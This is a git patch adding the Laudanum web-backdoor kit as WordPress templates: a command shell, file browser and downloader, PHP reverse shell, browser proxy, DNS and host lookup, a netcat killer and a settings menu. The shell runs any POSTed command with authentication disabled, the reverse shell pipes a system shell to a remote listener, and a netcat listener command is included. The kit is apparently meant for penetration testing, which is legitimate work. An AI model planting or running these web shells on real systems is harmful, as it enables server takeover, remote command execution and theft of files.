From a10dc295fd427ccc7cb1d3da8f4f5d8025d5a56e Mon Sep 17 00:00:00 2001 From: Adam Muntner Date: Wed, 9 Mar 2016 19:27:58 -0500 Subject: [PATCH] Added files via upload --- web-backdoors/wordpress/templates/dns.php | 144 +++++++ web-backdoors/wordpress/templates/file.php | 182 ++++++++ web-backdoors/wordpress/templates/host.php | 126 ++++++ web-backdoors/wordpress/templates/ipcheck.php | 61 +++ web-backdoors/wordpress/templates/killnc.php | 103 +++++ .../wordpress/templates/php-reverse-shell.php | 194 +++++++++ web-backdoors/wordpress/templates/proxy.php | 336 +++++++++++++++ .../wordpress/templates/settings.php | 67 +++ web-backdoors/wordpress/templates/shell.php | 389 ++++++++++++++++++ 9 files changed, 1602 insertions(+) create mode 100644 web-backdoors/wordpress/templates/dns.php create mode 100644 web-backdoors/wordpress/templates/file.php create mode 100644 web-backdoors/wordpress/templates/host.php create mode 100644 web-backdoors/wordpress/templates/ipcheck.php create mode 100644 web-backdoors/wordpress/templates/killnc.php create mode 100644 web-backdoors/wordpress/templates/php-reverse-shell.php create mode 100644 web-backdoors/wordpress/templates/proxy.php create mode 100644 web-backdoors/wordpress/templates/settings.php create mode 100644 web-backdoors/wordpress/templates/shell.php diff --git a/web-backdoors/wordpress/templates/dns.php b/web-backdoors/wordpress/templates/dns.php new file mode 100644 index 0000000..7107431 --- /dev/null +++ b/web-backdoors/wordpress/templates/dns.php @@ -0,0 +1,144 @@ + +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides access to DNS on the system. +*** Written by Tim Medin +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +include 'ipcheck.php'; + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP DNS Access + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + + +/* Initialize some variables we need again and again. */ +$query = isset($_POST['query']) ? $_POST['query'] : ''; +$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; +?> + + + + Laudanum PHP DNS Access + + + + + + +

DNS Query 0.1

+
+
+ DNS Lookup: +

Query: + Type: + +

+
+ + +"; + echo "Result = "; + print_r($result); + echo "Auth NS = "; + print_r($authns); + echo "Additional = "; + print_r($addtl); + echo ""; +} +?> +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/web-backdoors/wordpress/templates/file.php b/web-backdoors/wordpress/templates/file.php new file mode 100644 index 0000000..d80a2ae --- /dev/null +++ b/web-backdoors/wordpress/templates/file.php @@ -0,0 +1,182 @@ + +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file allows browsing of the file system. +*** Written by Tim Medin +*** +*** 12/28/2013 - updated by Jason Gillam - fixed parent folder. +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + + +include 'ipcheck.php'; + + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP File Browser + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +//set_error_handler('error_handler'); + + +/* Initialize some variables we need again and again. */ +$dir = isset($_GET["dir"]) ? $_GET["dir"] : "."; +$file = isset($_GET["file"]) ? $_GET["file"] : ""; + +if ($file != "") { + if(file_exists($file)) { + + $s = split("/", $file); + $filename = $s[count($s) - 1]; + header("Content-type: application/x-download"); + header("Content-Length: ".filesize($file)); + header("Content-Disposition: attachment; filename=\"".$filename."\""); + readfile($file); + die(); + } +} +?> + + + + Laudanum File Browser + + + + + + +

Laudanum File Browser 0.1

+Home
+ +Directory listing of / "; +$breadcrumb = '/'; +foreach ($dirs as $d) { + if ($d != '') { + $breadcrumb .= $d . "/"; + echo "$d/ "; + } +} +echo ""; + +// translate .. to a real dir +$parentdir = ""; +for ($i = 0; $i < count($dirs) - 2; $i++) { + $parentdir .= $dirs[$i] . "/"; +} + +echo ""; +echo ""; +echo ""; + +//get listing, separate into directories and files +$listingfiles = array(); +$listingdirs = array(); + +if ($handle = @opendir($curdir)) { + while ($o = readdir($handle)) { + if ($o == "." || $o == "..") continue; + if (@filetype($curdir . $o) == "dir") { + $listingdirs[] = $o . "/"; + } + else { + $listingfiles[] = $o; + } + } + + @natcasesort($listingdirs); + @natcasesort($listingfiles); + + //display directories + foreach ($listingdirs as $f) { + echo ""; + } + + //display files + foreach ($listingfiles as $f) { + echo ""; + } +} +else { + echo ""; +} +?> +
NameDateSize
../
" . $f . "" . "
" . $f . "" . "" . number_format(@filesize($curdir . $f)) . "

Can't open directory

+
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + diff --git a/web-backdoors/wordpress/templates/host.php b/web-backdoors/wordpress/templates/host.php new file mode 100644 index 0000000..aff4ac3 --- /dev/null +++ b/web-backdoors/wordpress/templates/host.php @@ -0,0 +1,126 @@ + +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides a host lookup by ip address. +*** Written by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +include 'ipcheck.php'; + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Hostname by IP Lookup + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + + +/* Initialize some variables we need again and again. */ +$query = isset($_POST['query']) ? $_POST['query'] : ''; +$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; +?> + + + + Laudanum Host Lookup + + + + + + +

Host Lookup 0.1

+
+
+ Host Lookup: +

IP: + + +

+
+ + +"; + echo "Result = "; + print_r($result); + echo ""; +} +?> +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/web-backdoors/wordpress/templates/ipcheck.php b/web-backdoors/wordpress/templates/ipcheck.php new file mode 100644 index 0000000..fe27d70 --- /dev/null +++ b/web-backdoors/wordpress/templates/ipcheck.php @@ -0,0 +1,61 @@ + +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools +*** by someone other than the person who uploaded Laudanum. This file should be included +*** in other Laudanum tools and not called directly. +*** Written by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + + +// ***************** Config entries below *********************** +// IPs are enterable as individual addresses TODO: add CIDR support +$wpl_allowedIPs = array("192.168.0.2", "127.0.0.1", "172.16.179.1"); + + +# *********** No editable content below this line ************** + +$wpl_allowed = 0; +foreach ($wpl_allowedIPs as $IP) { + if ($_SERVER["REMOTE_ADDR"] == $IP) + $wpl_allowed = 1; +} + +if ($wpl_allowed == 0) { + header("HTTP/1.0 404 Not Found"); + die(); +} + +?> \ No newline at end of file diff --git a/web-backdoors/wordpress/templates/killnc.php b/web-backdoors/wordpress/templates/killnc.php new file mode 100644 index 0000000..0c98587 --- /dev/null +++ b/web-backdoors/wordpress/templates/killnc.php @@ -0,0 +1,103 @@ + +*** Tim Medin +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file attempts to kill all netcat processes spawned by the current user. +*** This may be useful in cases where a reverse shell attempt has gone wrong. +*** +*** Written by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + + +include 'ipcheck.php'; + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Hostname by IP Lookup + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + + + +?> + + + + Laudanum Kill nc + + + + +

Kill nc 0.1

+ + +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/web-backdoors/wordpress/templates/php-reverse-shell.php b/web-backdoors/wordpress/templates/php-reverse-shell.php new file mode 100644 index 0000000..c2cf80d --- /dev/null +++ b/web-backdoors/wordpress/templates/php-reverse-shell.php @@ -0,0 +1,194 @@ + array("pipe", "r"), // stdin is a pipe that the child will read from + 1 => array("pipe", "w"), // stdout is a pipe that the child will write to + 2 => array("pipe", "w") // stderr is a pipe that the child will write to +); + +$process = proc_open($shell, $descriptorspec, $pipes); + +if (!is_resource($process)) { + printit("ERROR: Can't spawn shell"); + exit(1); +} + +// Set everything to non-blocking +// Reason: Occsionally reads will block, even though stream_select tells us they won't +stream_set_blocking($pipes[0], 0); +stream_set_blocking($pipes[1], 0); +stream_set_blocking($pipes[2], 0); +stream_set_blocking($sock, 0); + +printit("Successfully opened reverse shell to $ip:$port"); + +while (1) { + // Check for end of TCP connection + if (feof($sock)) { + printit("ERROR: Shell connection terminated"); + break; + } + + // Check for end of STDOUT + if (feof($pipes[1])) { + printit("ERROR: Shell process terminated"); + break; + } + + // Wait until a command is end down $sock, or some + // command output is available on STDOUT or STDERR + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + + // If we can read from the TCP socket, send + // data to process's STDIN + if (in_array($sock, $read_a)) { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + + // If we can read from the process's STDOUT + // send data down tcp connection + if (in_array($pipes[1], $read_a)) { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + + // If we can read from the process's STDERR + // send data down tcp connection + if (in_array($pipes[2], $read_a)) { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) printit("STDERR: $input"); + fwrite($sock, $input); + } +} + +fclose($sock); +fclose($pipes[0]); +fclose($pipes[1]); +fclose($pipes[2]); +proc_close($process); + +// Like print, but does nothing if we've daemonised ourself +// (I can't figure out how to redirect STDOUT like a proper daemon) +function printit ($string) { + if (!$daemon) { + print "$string\n"; + } +} + +?> + + + diff --git a/web-backdoors/wordpress/templates/proxy.php b/web-backdoors/wordpress/templates/proxy.php new file mode 100644 index 0000000..62d18f6 --- /dev/null +++ b/web-backdoors/wordpress/templates/proxy.php @@ -0,0 +1,336 @@ + +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file acts as a browser-based proxy. +*** Written by Tim Medin +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page +// figure out how to reuse sessionid from the remote site + +include 'ipcheck.php'; + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Proxy + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + +function geturlarray($u) { + // creates the url array, addes a scheme if it is missing and retries parsing + $o = parse_url($u); + if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); } + if (!isset($o["path"])) { $o["path"] = "/"; } + return $o; +} + +function buildurl ($u) { + // build the url from the url array + // this is used because the built in function isn't + // avilable in all installs of php + if (!isset($u["host"])) { return null; } + + $s = isset($u["scheme"]) ? $u["scheme"] : "http"; + $s .= "://" . $u["host"]; + $s .= isset($u["port"]) ? ":" . $u["port"] : ""; + $s .= isset($u["path"]) ? $u["path"] : "/"; + $s .= isset($u["query"]) ? "?" . $u["query"] : ""; + $s .= isset($u["fragment"]) ? "#" . $u["fragment"] : ""; + return $s; +} + +function buildurlpath ($u) { + //gets the full url and attempts to remove the file at the end of the url + // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/ + if (!isset($u["host"])) { return null; } + + $s = isset($u["scheme"])? $u["scheme"] : "http"; + $s .= "://" . $u["host"]; + $s .= isset($u["port"]) ? ":" . $u["port"] : ""; + + $path = isset($u["path"]) ? $u["path"] : "/"; + // is the last portion of the path a file or a dir? + // assume if there is a . it is a file + // if it ends in a / then it is a dir + // if neither, than assume dir + $dirs = explode("/", $path); + $last = $dirs[count($dirs) - 1]; + if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) { + // its a file, remove the last chunk + $path = substr($path, 0, -1 * strlen($last)); + } + + $s .= $path; + return $s; +} + +function getfilename ($u) { + // returns the file name + // e.g. http://blah.com/dir/file.ext returns file.ext + // technically, it is the last portion of the url, so there is a potential + // for a problem if a http://blah.com/dir returns a file + $s = explode("/", $u["path"]); + return $s[count($s) - 1]; +} + +function getcontenttype ($headers) { + // gets the content type + foreach($headers as $h) { + if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) { + return $out[1][0]; + } + } +} + +function getcontentencoding ($headers) { + foreach ($headers as $h) { + if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) { + return $out[1][0]; + } + } +} + +function removeheader($header, $headers) { + foreach (array_keys($headers) as $key) { + if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) { + unset($headers[$key]); + return $headers; + } + } +} + +function rewritecookies($headers) { + // removes the path and domain from cookies + for ($i = 0; $i < count($headers); $i++) { + if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) { + $headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]); + $headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]); + } + } + return $headers; +} + +function getsessionid($headers) { + for ($i = 0; $i < count($headers); $i++) { + if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out)) + return $out[1][0]; + } + return "0"; +} + +function compatible_gzinflate($gzData) { + if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) { + $i = 10; + $flg = ord( substr($gzData, 3, 1) ); + if ( $flg > 0 ) { + if ( $flg & 4 ) { + list($xlen) = unpack('v', substr($gzData, $i, 2) ); + $i = $i + 2 + $xlen; + } + if ( $flg & 8 ) + $i = strpos($gzData, "\0", $i) + 1; + if ( $flg & 16 ) + $i = strpos($gzData, "\0", $i) + 1; + if ( $flg & 2 ) + $i = $i + 2; + } + return @gzinflate( substr($gzData, $i, -8) ); + } else { + return false; + } + return false; +} + +function rewrite ($d, $u) { + $r = $d; + //rewrite images and links - absolute reference + $r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r); + //rewrite images and links - hard linked + $r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r); + //rewrite images and links - relative reference + $r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r); + + + //rewrite form - absolute reference + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + //rewrite form - hard linked + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + //rewrite form - relative reference + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + return $r; +} + +/* Initialize some variables we need again and again. */ +$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : ""; +if ($url == "") { + $url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : ""; +} + +if ($url == "") { +?> + + + + Laudanum PHP Proxy + + + + + + +

Laudanum PHP Proxy

+ +
+ + +
+
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + + diff --git a/web-backdoors/wordpress/templates/settings.php b/web-backdoors/wordpress/templates/settings.php new file mode 100644 index 0000000..06f9817 --- /dev/null +++ b/web-backdoors/wordpress/templates/settings.php @@ -0,0 +1,67 @@ + +*** Tim Medin +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides a convenient menu of Laudanum tools from a Word Press settings +*** page. +*** +*** Written by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ +?> + + +
+

Laudanum Tools

+ + * for reverse shell, use netcat to listen, e.g. "nc -v -n -l 8888" +
+ \ No newline at end of file diff --git a/web-backdoors/wordpress/templates/shell.php b/web-backdoors/wordpress/templates/shell.php new file mode 100644 index 0000000..1ba2445 --- /dev/null +++ b/web-backdoors/wordpress/templates/shell.php @@ -0,0 +1,389 @@ + +*** Tim Medin +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides shell access to the system. It is built based on the 2.1 +*** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler +*** +*** +*** Updated by Tim Medin +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + + +include 'ipcheck.php'; + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Shell Access + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +// set_error_handler('wpl_error_handler'); + + +function logout() { + $_SESSION = array('authenticated' => false); + if (isset($_COOKIE[session_name()])) + setcookie(session_name(), '', time()-42000, '/'); + session_destroy(); +} + + +function wpl_stripslashes_deep($value) { + if (is_array($value)) + return array_map('stripslashes_deep', $value); + else + return stripslashes($value); +} + +if (get_magic_quotes_gpc()) + $_POST = stripslashes_deep($_POST); + +/* Initialize some variables we need again and again. */ +//$username = isset($_POST['username']) ? $_POST['username'] : ''; +//$password = isset($_POST['password']) ? $_POST['password'] : ''; +//$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : ''; + +$command = isset($_POST['command']) ? $_POST['command'] : ''; +$rows = isset($_POST['rows']) ? $_POST['rows'] : 24; +$columns = isset($_POST['columns']) ? $_POST['columns'] : 80; + + +///* Default settings --- these settings should always be set to something. */ +//$default_settings = array('home-directory' => '.'); + +///* Merge settings. */ +//$ini['settings'] = array_merge($default_settings, $ini['settings']); + + +session_start(); + +/* Delete the session data if the user requested a logout. This leaves the + * session cookie at the user, but this is not important since we + * authenticates on $_SESSION['authenticated']. */ +if (isset($_POST['logout'])) + logout(); + +///* Attempt authentication. */ +//if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && +// isset($ini['users'][$username])) { +// if (strchr($ini['users'][$username], ':') === false) { +// // No seperator found, assume this is a password in clear text. +// $_SESSION['authenticated'] = ($ini['users'][$username] == $password); +// } else { +// list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]); +// $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash); +// } +//} + +/* Attempt authentication. */ +if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username])) + $_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password)); + +/* Enforce default non-authenticated state if the above code didn't set it + * already. */ +if (!isset($_SESSION['authenticated'])) + $_SESSION['authenticated'] = false; + +if(true) { +//if ($_SESSION['authenticated']) { + /* Initialize the session variables. */ + if (empty($_SESSION['cwd'])) { + $_SESSION['cwd'] = '.'; + $_SESSION['history'] = array(); + $_SESSION['output'] = ''; + } + + if (!empty($command)) { + /* Save the command for late use in the JavaScript. If the command is + * already in the history, then the old entry is removed before the + * new entry is put into the list at the front. */ + if (($i = array_search($command, $_SESSION['history'])) !== false) + unset($_SESSION['history'][$i]); + + array_unshift($_SESSION['history'], $command); + + /* Now append the commmand to the output. */ + $_SESSION['output'] .= '$ ' . $command . "\n"; + + /* Initialize the current working directory. */ + if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) { + $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); + } elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) { + /* The current command is a 'cd' command which we have to handle + * as an internal shell command. */ + + if ($regs[1]{0} == '/') { + /* Absolute path, we use it unchanged. */ + $new_dir = $regs[1]; + } else { + /* Relative path, we append it to the current working + * directory. */ + $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; + } + + /* Transform '/./' into '/' */ + while (strpos($new_dir, '/./') !== false) + $new_dir = str_replace('/./', '/', $new_dir); + + /* Transform '//' into '/' */ + while (strpos($new_dir, '//') !== false) + $new_dir = str_replace('//', '/', $new_dir); + + /* Transform 'x/..' into '' */ + while (preg_match('|/\.\.(?!\.)|', $new_dir)) + $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); + + if ($new_dir == '') $new_dir = '/'; + + /* Try to change directory. */ + if (@chdir($new_dir)) { + $_SESSION['cwd'] = $new_dir; + } else { + $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; + } + + } elseif (trim($command) == 'exit') { + logout(); + } else { + + /* The command is not an internal command, so we execute it after + * changing the directory and save the output. */ + chdir($_SESSION['cwd']); + + // We canot use putenv() in safe mode. + if (!ini_get('safe_mode')) { + // Advice programs (ls for example) of the terminal size. + putenv('ROWS=' . $rows); + putenv('COLUMNS=' . $columns); + } + + /* Alias expansion. */ + $length = strcspn($command, " \t"); + $token = substr($command, 0, $length); + if (isset($ini['aliases'][$token])) + $command = $ini['aliases'][$token] . substr($command, $length); + + $io = array(); + $p = proc_open($command, + array(1 => array('pipe', 'w'), + 2 => array('pipe', 'w')), + $io); + + /* Read output sent to stdout. */ + while (!feof($io[1])) { + $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), + ENT_COMPAT, 'UTF-8'); + } + /* Read output sent to stderr. */ + while (!feof($io[2])) { + $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), + ENT_COMPAT, 'UTF-8'); + } + + fclose($io[1]); + fclose($io[2]); + proc_close($p); + } + } + + /* Build the command history for use in the JavaScript */ + if (empty($_SESSION['history'])) { + $js_command_hist = '""'; + } else { + $escaped = array_map('addslashes', $_SESSION['history']); + $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; + } +} + +?> + + + + Laudanum Shell + + + + + + + +

Laudanum Shell

+ +
+ + + +
+ Authentication + + Login failed, please try again:

' . "\n"; + else + echo "

Please login:

